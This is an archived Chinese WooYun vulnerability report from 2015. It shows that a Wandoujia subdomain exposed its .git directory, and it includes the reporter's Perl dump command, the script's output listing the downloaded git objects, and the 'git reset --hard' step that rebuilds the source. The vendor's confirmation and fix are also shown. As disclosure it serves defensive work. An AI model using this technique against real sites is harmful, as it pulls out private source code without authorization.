当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096049

漏洞标题:豌豆荚git服务使用不当导致整站源代码泄露

相关厂商:豌豆荚

漏洞作者: 我是小号

提交时间:2015-02-07 12:51

修复时间:2015-02-07 13:58

公开时间:2015-02-07 13:58

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-07: 细节已通知厂商并且等待厂商处理中
2015-02-07: 厂商已经确认,细节仅向厂商公开
2015-02-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

豌豆荚git服务使用不当导致站点源代码泄露

详细说明:

问题站点:uowechat.wandoujia.com
#1.
探测得到豌豆荚某分站的git配置文件夹可以未授权访问
http://uowechat.wandoujia.com/.git/config

00.png


说明整个git服务的源代码都可以被未授权脱下来了。
#2.拿出Perl脚本自动化查询目录:

D:\>perl 1.pl -v -u http://uowechat.wandoujia.com/.git
[i] Downloading git files from http://uowechat.wandoujia.com/.git
[!] Not found for COMMIT_EDITMSG: 401 Unauthorized
[d] found config
[d] found description
[d] found HEAD
[d] found index
[d] found packed-refs
[!] Not found for objects/info/alternates: 401 Unauthorized
[!] Not found for info/grafts: 401 Unauthorized
[d] found logs/HEAD
[d] found objects/21/781e86ba9fc71129454bd00256b35c9294ab9e
[d] found objects/41/6f10af77010d15cb7e9f9b04f1965eb66e2909
[d] found objects/4c/c631822ce0513394c723e88b890f5d8974fa04
[d] found objects/7b/477141babf0f7428b55b3a5bd11bd05d0e355e
[d] found objects/42/ac3584755641a5771f52b114a809f3fef53870
[d] found objects/7d/efbca812acba361fba467fe0742608c3449a0d
[d] found objects/68/7fae808e3971978bfd9b0c1c2b3b3350135156
[d] found objects/dd/f805ed1d7730211a717ee9dc6293936f66b7e7
[d] found objects/f8/a01be9a11babb6618468124ab62fb8e2dd50a5
[d] found objects/e0/474e360ef92e488fcf6e5941dfd81f94fbdb8b
[d] found objects/2c/67b7b7c9f17267cba781357f23f675fd0c3a8a
[d] found objects/4d/5fd2aa3aeb61d96a9f88a72dca76fa831df757
[d] found objects/2b/432231076c0c7d729369399cae90b720ec9ea9
[d] found objects/ab/e84b1ad4a22669c4e8af0242ab2532573ca830
[d] found objects/af/97319f6c819cd89618e949bf774167d63568d7
[d] found objects/cc/5dd5ba051dc3188f31679fa884795cc27666b4
[d] found objects/c2/5f2a827a793cbd1aa595f608fef1cb1116abe8
[d] found objects/d4/88054ccd96de32f0839f35076efa39439ed429
[d] found objects/42/8033e673b0e18651510520f87b4f2d62c055e5
[d] found objects/79/6bb005c182381652380a9b024dd127d5626e8b
[d] found objects/98/56e7e28fa7306ace43a776b89a105db03e2108
[d] found objects/54/1c067b58773778775a1c01396539243923caf8
[d] found objects/60/63292d548767c581d5e5e0e54372273d743a4b
[d] found objects/65/43a396e99e37718fb87afe739180a8efc64cae
[d] found objects/2b/839c170525697e82fc7d0c0d957dabbef37e0d
[d] found objects/3c/a9853094b25de5362a0a146e91df5d90d15955
[d] found objects/d7/a736eb482e8088d66210c93a67e8aa41a479e5
[d] found objects/13/fc9c3534ae54b585165fa60ffb93d5237de7be
[d] found objects/d9/23e0a6863ed8816342851dd8cfbe8e9aa6ffed
[d] found objects/01/b9566643938c700b7a5b59e765c6ef5322d4c4
[d] found objects/c0/0eedfc4d8b32857b29aefc7f47e38aaca316d7
[d] found objects/b2/552bc8dce740984a0793fb687210072f44631f
[d] found objects/bf/4fa8ca05d1b6bd8274d8c12c7389b71b7d34ee
[d] found objects/10/4199230d225b4a40fb64e4f60eabbddcb0350d
[d] found objects/e1/8967ff8b06e4f54956e7918e79511ae87d9890
[d] found objects/27/235db58a05274089e9e104438c8eb966658678
[d] found objects/45/a331660decc7604f0ed8dd483f7c874e1c36c5
[d] found objects/95/d5577d6569740e184986c78671dae01bce3d48
[d] found objects/72/66efe7b2d3cd4adb09b1b53fc87384ee31a857
[d] found objects/d1/389dc2f9d378b5c9422e72a73ab659f9449bec
[d] found objects/28/63a6d130bd86ccc31a5d664463753e4e04a205
[d] found objects/64/4539c07c96b41c8b8ad0910c449fddf11fdf8d
[d] found objects/41/c5f512eb20ca63f590d0ecf8d9bd27ae60cb98
[d] found objects/ef/af66512a513382ae2a72d32931ec733e19a11e
[!] Not found for objects/b9/420f126eeb0495c68806e8b0d346201b747e96: 401 Unautho
rized
[d] found objects/b8/5f7b66685856dba58ca1bc6344f0c5350643f1
[d] found objects/72/0d533cecacc2f1e8c2a0fa426ade55b8a536bb
[d] found objects/af/00ef47453ad90bb81e0cd4bc1529f786e18ec7
[d] found objects/11/abf77e2c7172b00ea442b1aaef41dff3a63cab
[d] found objects/17/ee4fcae215c622f28468994ca4eb96f40bb46a
[d] found objects/32/b1b06aef7eed00a8aa64932ece6de3f3ffa53d
[d] found objects/92/7cd85b1646d3bd9bffc94da9d9dbf083c0aada
[d] found objects/b9/f0d225b9f099ba06882332afac25ddaf58f6d3
[d] found objects/ce/e6d78ab06f7291eb49c8a6b08138892908333d
[d] found objects/b5/3b6060ee1b831d28fa88c90ed3d87834d9cd5b
[d] found objects/6d/6771088561509d8580d197b0668a70766e0963
[d] found objects/09/44f5aa1e05a51f153fbcfdddc377506594268f
[d] found objects/e5/242a64e8ced2540ec96301c4bbaebbc825c624
[d] found objects/b3/02b67131071942261ae450df918685d3e8ec51
[d] found objects/20/03d0f43bab6a1f9001827530be3432c0e19952
[d] found objects/a2/cd6bfe5a7610e402798c5e58c5ea8717c89f6d
[d] found objects/95/20a00fc0ca60c69a07797bb2010463502e0910
[d] found objects/2e/4f88cea10bc4bd7f3d6a461fb6e7036174f697
[d] found objects/27/bfaa9d02fd2e093ff3e49319b49aa22b6b6278
[d] found objects/7b/6cf5ec48ffc6f187ada63954d29cd24fe3562b
[d] found objects/b6/2190ca95d02aa7bcecb4b78fda29b8cf127efb
[d] found objects/71/a76387ee0e6a1968e5684f0e5444dda25c65a7
[d] found objects/70/ead588f82c234f456b27fb2893ddecefb1a998
[d] found objects/f1/e09b525fd48f1686235bb2b95058826db7f677
[d] found objects/f8/459531a4b39c44476d5822e27570818baf71ce
[d] found objects/8b/5690d9caa9d8380f2522dc8cd2b1268733520a
[d] found objects/6b/b22c94d3c924f7f6ef857dc8f4fba56d8c5972
[d] found objects/d1/fec87f9e90258402a9f53a05480416344736e1
[d] found objects/3a/4f2184acacf348fba5947d3a757b05e74ed4d7
[d] found objects/b2/1b7a51e5b1dfd2b6d8b5ab8ebf0878ec02e703
[d] found objects/bc/fb89b4b16b5ee2bde9cc613e8375f2069ca4ff
[d] found objects/0d/77120fa3d943cecb94a5c5faffbdbe2785c757
[d] found objects/a7/6a62296420bd3d6af855435a3d71c27f8783fe
[d] found objects/11/5fabc9f0de5d1203cf1bb62ebdef9e279c7447
[d] found objects/9e/d1eaea7864fcd688240038cb128ab6347e21d7
[d] found objects/9e/62ba0cda9ecb5e3aa67dbbaeac58dd9e71b1fb
[d] found objects/80/e6d2048628a329eea6063ff90ef4db90a78b62
[d] found objects/71/2636edaf23a153841e15af192b08d285a6e9c6
[d] found refs/heads/master
[i] Running git fsck to check for missing items


至此整个目录都脱下来了,如果要利用的话: 

git reset --hard


就能还原整站了。

漏洞证明:

进个目录截图证明一下:
~!: logs/HEAD

02.png


修复方案:

git服务应正确配置

版权声明:转载请注明来源 我是小号@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-02-07 13:57

厂商回复:

感谢对豌豆荚安全的帮助。漏洞已经处理,这个代码是一个小兄弟拉的开源代码,稍微好一点点,但我们仍需改进。

最新状态:

2015-02-07:已修复。

2015-02-07:似乎这个标题不是很好,『整站』给人以豌豆荚整个站点的感觉,其实是两个边缘应用,当然边缘应用的代码泄露已经非常值得注意了。

漏洞评价:

评论